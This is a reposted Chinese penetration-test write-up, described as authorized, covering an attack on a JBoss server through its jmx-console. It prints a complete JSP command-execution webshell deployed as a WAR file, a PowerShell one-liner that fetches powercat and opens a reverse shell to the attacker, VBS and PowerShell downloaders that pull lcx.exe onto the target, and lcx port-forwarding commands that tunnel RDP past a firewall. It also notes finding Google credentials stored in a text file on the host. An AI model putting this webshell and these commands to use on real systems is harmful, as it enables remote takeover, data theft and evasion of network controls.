一.前言
最近做滲透測試中遇到一個jboss的站,在其中學到一些在乙方工作挺有用的技巧(這次測試是進過授權測試)在次分享一下
二.信息收集
先通過namp進行掃描,同時進行目錄掃描,發現8080/jmx-console/,發現是jboss的站,百度到jboss可以部署war包getshell,訪問http://xxxx:8080//jmx-console/
三.漏洞利用
全局搜索jboss.system,點擊進入
1.制作war包把木馬文件gg.jsp(我是一個直接執行命令代碼)用壓縮軟件壓縮為zip,然后更改后綴為war,然后將該war上傳到互聯網上能夠訪問的網
站上
//gg.jsp <%@ page contentType="text/html;charset=big5" session="false" import="java.io.*" %> <html> <head> <title>title> <meta http-equiv="Content-Type" content="text/html; charset=big5"> head> <body> <% Runtime runtime = Runtime.getRuntime(); Process process =null; String line=null; InputStream is =null; InputStreamReader isr=null; BufferedReader br =null; String ip=request.getParameter("cmd"); try { process =runtime.exec(ip); is = process.getInputStream(); isr=new InputStreamReader(is); br =new BufferedReader(isr); out.println("
"); while( (line = br.readLine()) != null ) { out.println(line); out.flush(); } out.println(""); is.close(); isr.close(); br.close(); } catch(IOException e ) { out.println(e); runtime.exit(1); } %> body> html> 我這里就用python 簡單創建個ftp服務(這也是python的一個巧用)
python -m SimpleHTTPServer 8589
2.進入jboss.system頁面找到如下,填入遠程的war文件地址
成功部署的界面如下
3.訪問shell地址,并執行命令
四.進一步滲透
1.在獲得php shell的基礎上,我們需要一個真正的cmd shell,這樣有利于操作,進過nmap掃描,發現是windows,我們可以通過powershell進行shell反彈powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip -p port -e cmd
本地監聽,成功獲取一個cmd shell,接下來就是提權了
2.在cmd 中查看端口開放信息,3389和445都開放了 想到了永恒之藍打一波,先看看打沒打永恒之藍的補丁,和看看系統信息,發現打了很多補丁
可以通過如下鏈接查看補丁編號 網址:https://micro8.gitbook.io/micro8/contents-1/1-10/1windows-ti-quan-kuai-su-cha-zhao-exp 查找永恒之藍補丁編號進行比對發現該目標機器并沒打補丁
3.看端口掃描結果,3389過濾了,445也過濾了,只有端口轉發再打了
4.先在shell中查看有那些任務,看看有沒殺毒軟件,初看沒有,但后來才發現了,居然有卡巴斯基
5.沒事就到處瀏覽目錄查看內容(發現google賬號密碼居然記錄在txt文件中),發現任何目錄都能瀏覽和看信息,就懷疑這個用戶的權限,趕緊看了哈…居然是administrator 組的,那提權就不用了澀,但還是想3389連進去
6.打算用vbs下載一個lcx或者EarthWorm進行端口轉發,vbs下載代碼,一般下載在C:WindowsTemp目錄下,可讀可寫vbs下載代碼
echo Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbs echo Set Shell = CreateObject("Wscript.Shell") >>download.vbs echo Post.Open "GET","http://ip/lcxx/lcx.exe",0 >>download.vbs echo Post.Send() >>download.vbs echo Set aGet = CreateObject("ADODB.Stream") >>download.vbs echo aGet.Mode = 3 >>download.vbs echo aGet.Type = 1 >>download.vbs echo aGet.Open() >>download.vbs echo aGet.Write(Post.responseBody) >>download.vbs echo aGet.SaveToFile "C:WindowsTemp2.txt",2 >>download.vbs
powershell 下載代碼powershell (new-object System.Net.WebClient).DownloadFile( 'http://ip:7667/lcxx/lcx.exe','C:WindowsTemp2.txt')
7.當自己寫進去了后,更名為exe執行的時候,被殺了,最后又看了下任務,才發現卡巴斯基,然后就一直被卡在這里8.lcx命令如下lcx 命令//被攻擊機器 lcx -slave 自己外網ip 51 內網ip 3389 //攻擊機器 lcx.exe -listen 51 9090
由于防火墻限制,部分端口如3389無法通過防火墻,此時可以將該目標主機的3389端口透傳到防火墻允許的其他端口,如53端口.lcx -tran 53 目標主機ip 3389
總結
雖然暫時沒有成功,但從中還是學到許多滲透知識,也明白了實戰能提高許多技術。不足就是知識不夠,還需努力。
審核編輯 :李倩
聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規問題,請聯系本站處理。
舉報投訴
-
漏洞
+關注
關注
0文章
204瀏覽量
15368 -
滲透
+關注
關注
0文章
20瀏覽量
6273 -
Shell
+關注
關注
1文章
365瀏覽量
23358
原文標題:實戰|一次不完美的Jboss滲透
文章出處:【微信號:菜鳥學信安,微信公眾號:菜鳥學信安】歡迎添加關注!文章轉載請注明出處。
發布評論請先 登錄
相關推薦
不完美的伴侶機器人?
在與人類交互的過程中,表現出與人類相似的不完美,我們就有信心建立起長期的人機關系?!薄 ?b class='flag-5'>一位研究員在接受BBC采訪時說,機器人的開發取決于用途,工業機器人當然需要很完美,我們不希望它們犯錯誤。但是對伴侶機器人來說,它們的行為很重
發表于 12-28 14:42
讓STM32完美的處理字符串
今天因為想讓STM32完美的處理字符串,所以就想著讓STM32嵌入lua,本來想用f103c8t6,但是一編譯就提示內存不足......所以單片機的型號選擇的\我下載到了RBT6的芯片上測試的先說
發表于 08-20 08:11
循環充放電一次就是少一次壽命嗎?
循環充放電一次就是少一次壽命嗎?循環就是使用,我們是在使用電池,關心的是使用的時間,為了衡量充電電池的到底可以使用多長時間這樣一個性能,就規定了循環
發表于 09-07 02:06
?2057次閱讀
一次電池為什么不能被充電?
一次電池為什么不能被充電? 一次電池不能被充電再生是構成一次電池體系的本性所決定的,因為一次電池的電極反應不可逆,也就是說,放電后的放電產
發表于 10-28 15:29
?5853次閱讀
游戲AI的前世今生,完美的目標不完美的世界
。AlphaGo Zero的第一次嘗試是完全隨機的,在每場比賽結束后,它都會對所取得勝利和未取勝的新知識進行總結。經過訓練,最后這個AI和曾擊敗過李世石的AlphaGo直接對決,以100比0拿下了徹底的勝利。
微軟SurfaceHeadphones無線降噪耳機體驗 一次驚艷但不完美的嘗試
隨著越來越多的手機選擇砍掉 3.5 毫米耳機插孔,無線藍牙耳機從前幾年的小眾產品迅速變成了很多用戶的剛需。
基波是一次諧波么 基波與一次諧波的區別
基波是一次諧波么 基波與一次諧波的區別? 基波和一次諧波是兩個不同的概念。 基波是在諧波分析中指的是頻率最低且沒有任何諧波成分的波形,它是構成復雜波形的基礎。在正弦波中,基波就是正弦波的本身。基波
評論